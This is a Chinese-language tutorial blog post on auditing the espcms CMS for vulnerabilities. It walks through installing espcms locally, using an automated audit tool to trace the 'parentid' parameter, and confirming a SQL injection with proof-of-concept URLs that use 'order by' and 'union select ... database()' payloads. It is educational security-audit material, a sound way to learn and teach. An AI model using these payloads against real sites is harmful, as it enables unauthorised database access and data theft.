【安全】P 2-22 SQL注入漏洞简单挖掘 - 代码审计挖掘0day

0X01 CMS环境搭建(espcms)

下载地址
下载后解压到WWW目录下
在这里插入图片描述
浏览器访问http://127.0.0.1/espcms/upload/index.php进行安装
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
设置相关信息
在这里插入图片描述
在这里插入图片描述
安装完成,进行登录
在这里插入图片描述
在这里插入图片描述

正常访问,完成搭建
在这里插入图片描述

0X02 自动化审计工具

作者网站现在已经无法访问:http://www.cnseay.com/
github下载地址
CSDN下载地址
在这里插入图片描述

点击“新建项目”,打开espcms目录,再点:自动审计->开始
在这里插入图片描述
在这里插入图片描述

0X03 直接挖掘select注入

已这条漏洞提示为例
在这里插入图片描述

双击达到位置
在这里插入图片描述

parentid是通过accept函数获得的,我们定位函数
在这里插入图片描述

看到有两条路径
在这里插入图片描述

通过双击查看,发现有一个提交参数过滤机制,定位函数
在这里插入图片描述

找到函数
在这里插入图片描述
在这里插入图片描述

判断这不是一个字符注入
接下来执行函数,首先对important类进行全局搜索
在这里插入图片描述

看到第一条路径是初始化,双击打开
在这里插入图片描述
在这里插入图片描述

分析源码
在这里插入图片描述

首先获得archive,如果为空就使用adminuser
action同理
也就是说函数在citylist下获得内容,传参为parentid

构造url,访问index.php进行测试

0X04 漏洞验证POC

url 测试

http://127.0.0.1/espcms/upload/adminsoft/index.php?archive=citylist&action=citylist&parentid=1

在这里插入图片描述

http://127.0.0.1/espcms/upload/adminsoft/index.php?archive=citylist&action=citylist&parentid=1%20order%20by%206

在这里插入图片描述

http://127.0.0.1/espcms/upload/adminsoft/index.php?archive=citylist&action=citylist&parentid=-1%20union%20select%201,2,3,4,5

在这里插入图片描述

http://127.0.0.1/espcms/upload/adminsoft/index.php?archive=citylist&action=citylist&parentid=-1%20union%20select%201,2,database(),4,5

在这里插入图片描述

-----E-----N-----D-----
😄如有问题,请各位师傅斧正,你的支持是我最大的动力。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值